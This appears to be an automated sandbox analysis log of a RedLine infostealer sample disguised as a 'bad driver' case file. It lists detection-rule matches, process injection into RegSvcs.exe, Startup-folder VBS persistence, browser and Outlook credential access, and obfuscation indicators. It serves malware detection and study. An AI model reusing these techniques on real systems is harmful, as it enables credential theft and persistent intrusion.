Source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.name.exe.33a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.name.exe.3710000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000000A.00000002.3336864673.0000000003710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000008.00000002.3304083272.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000000B.00000002.3449507339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000E.00000002.3449893133.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, cPs8D.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, 72CF8egH.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, G5CXsdn.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, 3uPsILA6U.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, 6oQOw74dfIt.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, aMIWm.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, 3QjbQ514BDx.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, 3QjbQ514BDx.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@14/12@1/1

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00C1A2D5 GetLastError,FormatMessageW,

0_2_00C1A2D5

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C08713 AdjustTokenPrivileges,CloseHandle,	0_2_00C08713
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C08CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_00C08CC3
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A18713 AdjustTokenPrivileges,CloseHandle,	8_2_00A18713
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A18CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	8_2_00A18CC3

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00C1B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00C1B59E

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00C2F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00C2F121

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00C286D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00C286D0

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00BB4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00BB4FE9

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

File created: C:\Users\user\AppData\Local\directory

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

File created: C:\Users\user\AppData\Local\Temp\aut5AD0.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"

Source: Case_Your company bad driver Vehicle No.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Case_Your company bad driver Vehicle No.exe	Virustotal: Detection: 67%
Source: Case_Your company bad driver Vehicle No.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

File read: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe "C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe"
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Case_Your company bad driver Vehicle No.exe

Static file information: File size 1172480 > 1048576

Source: Case_Your company bad driver Vehicle No.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Case_Your company bad driver Vehicle No.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Case_Your company bad driver Vehicle No.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Case_Your company bad driver Vehicle No.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Case_Your company bad driver Vehicle No.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Case_Your company bad driver Vehicle No.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Case_Your company bad driver Vehicle No.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: RegSvcs.exe, 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3841331858.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3845657517.00000000042D5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: name.exe, 00000008.00000003.3296361938.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.3296658216.0000000003830000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3328159917.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3328274117.0000000003950000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000E.00000003.3446492753.0000000004200000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000E.00000003.3446375928.0000000004060000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000008.00000003.3296361938.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.3296658216.0000000003830000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3328159917.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3328274117.0000000003950000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000E.00000003.3446492753.0000000004200000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000E.00000003.3446375928.0000000004060000.00000004.00001000.00020000.00000000.sdmp

Source: Case_Your company bad driver Vehicle No.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Case_Your company bad driver Vehicle No.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Case_Your company bad driver Vehicle No.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Case_Your company bad driver Vehicle No.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Case_Your company bad driver Vehicle No.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00C2C304 LoadLibraryA,GetProcAddress,

0_2_00C2C304

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BD8B85 push ecx; ret	0_2_00BD8B98
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009E8B85 push ecx; ret	8_2_009E8B98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0041C40C push cs; iretd	11_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_00423149 push eax; ret	11_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0041C50E push cs; iretd	11_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_004231C8 push eax; ret	11_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0040E21D push ecx; ret	11_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0041C6BE push ebx; ret	11_2_0041C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02AB1E80 push edx; retf	11_2_02AB1E82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02AB462A push edx; retf	11_2_02AB462C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02AB6604 push edx; retf	11_2_02AB6614
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02AB5F8A push edx; retf	11_2_02AB5F8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02AB57F1 push edx; retf	11_2_02AB57FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02AB2722 push edx; retf	11_2_02AB2723
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02AB4316 pushfd ; iretd	11_2_02AB4319
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02AB4758 push edx; retf	11_2_02AB4763
